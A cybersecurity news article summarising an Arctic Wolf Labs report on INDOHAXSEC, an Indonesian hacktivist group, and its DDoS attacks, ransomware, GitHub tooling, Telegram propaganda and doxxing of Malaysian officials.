INDOHAXSEC: Emerging Indonesian Hacktivist Collective Targets Southeast Asia

A new report by Arctic Wolf Labs has shed light on a growing hacktivist group operating out of Indonesia. The group, known as INDOHAXSEC, has been making waves in Southeast Asia with a series of cyberattacks.

According to the report, INDOHAXSEC was officially established in early October 2024 and has been involved in activities such as distributed denial-of-service (DDoS) attacks and ransomware deployments. The group targets various entities and governmental bodies within the region, and they utilize a combination of their own tools and others found online.

Arctic Wolf Labs describes the group as “largely politically motivated, but also occasionally financially driven.” Hacktivism is typically carried out by individuals as a form of online resilience against political, ethical, or social causes. Activities can range from website defacements and denial-of-service attacks to data leaks.

INDOHAXSEC uses its tactics both as a form of protest and to advance its own political ideologies and objectives. The group frequently targets entities perceived as supporting Israel, indicating that many of their latest activities are motivated by pro-Palestinian sentiments and religious ideology.

In a move that suggests a potential broadening of their ideological scope, INDOHAXSEC announced an alliance with the pro-Russian hacktivist group NoName057(16) in November 2024.

The report highlights that while INDOHAXSEC is relatively new, some of its members have been previously associated with other hacktivist groups in the region.

INDOHAXSEC maintains a GitHub repository that contains their custom tooling and a link to their official group Telegram account. The repository contains various malicious scripts and tools authored in different programming languages. Most of these tools are described as rudimentary and designed for basic nefarious purposes, including DDoS attacks, website defacement, and other cyberattacks.

The report details some of the tools, including:

• Ark-Cheat-Detector: A forked and modified repository for detecting cheats related to ARK: Survival Evolved. INDOHAXSEC modified the repository to include “white.php,” a PHP dropper used to download a multipurpose PHP backdoor.

• NUKLIR and RUDAL: A collection of DDoS tools available in both Python and Node.js formats.

• Rudal-shell: A collection of PHP scripts including backdoors, Exorlock ransomware, and other tools for compromising web servers.

• Xss_Fucker: A compiled python file designed to scan target websites for cross-site scripting (XSS) vulnerabilities.

Individual members of the collective also maintain their own GitHub repositories with other tooling for DDoSing and defacing websites.

INDOHAXSEC’s TikTok video channel suggests an interest in using OpenAI’s ChatGPT tool, specifically for information around file permissions and encryption. The timestamp of one video was one day prior to the GitHub commit history timestamps of the “website destroying malware” called “Dancokware,” leading to speculation that ChatGPT may have been used to improve the malware.

The report notes that threat actors abusing ChatGPT is not a new development, and cybercriminals have already begun using it for various malicious activities, such as crafting phishing emails and debugging code. The report provides an example of the Dancokware malware, noting its file encryption and chmod capabilities.

The report also delves into the history of the ExorLock ransomware, noting that it was written by an earlier iteration of the group when they were active under the name AnonBlackFlag. In May 2024, it was claimed that Exorlock was used against an Indian website during their elections.

INDOHAXSEC, like many malicious entities, maintains a Telegram channel with over 4,000 subscribers. The channel is used for communication, coordination, and propaganda. Telegram’s lack of moderation and large group chat capabilities make it ideal for spreading narratives and organizing illicit activities.

The report notes that INDOHAXSEC has claimed to have developed a successor to the WannaCry ransomware, dubbed WannaCry 2.0. However, this claim is unsubstantiated.

Analysis of the group’s use of hashtags in their Telegram communications reveals insights into their targeting and victims, with #FREE_PALESTINE being the most frequently used. Further analysis of their Telegram communications indicates that India, Israel, and Malaysia are the countries most often mentioned.

INDOHAXSEC also uses social media platforms like TikTok to showcase their activities and attract attention. More recently, they have used X (formerly Twitter) to carry out doxxing campaigns, exposing personal information of Malaysian officials.

In response to persistent targeting, the National Cyber Coordination and Command Center (NC4) released an advisory on the heightened cyber threat of “Hacktivist Activities Targeting Malaysia”.

Related Posts:

• Southeast Asian lose $171 billion due to Cybercrime activity
• China-Linked Phishing Campaign Exploits Geopolitical Tensions, Ravages Asian Finance Sector
• High-Profile Organizations in Southeast Asia Hit by Targeted Cyberattacks
• North Korea’s Lazarus Group: A Persistent Threat to the Defense Sector
• CrowdStrike Data Leak Claims Spark Concern, Hacktivist Credibility Questioned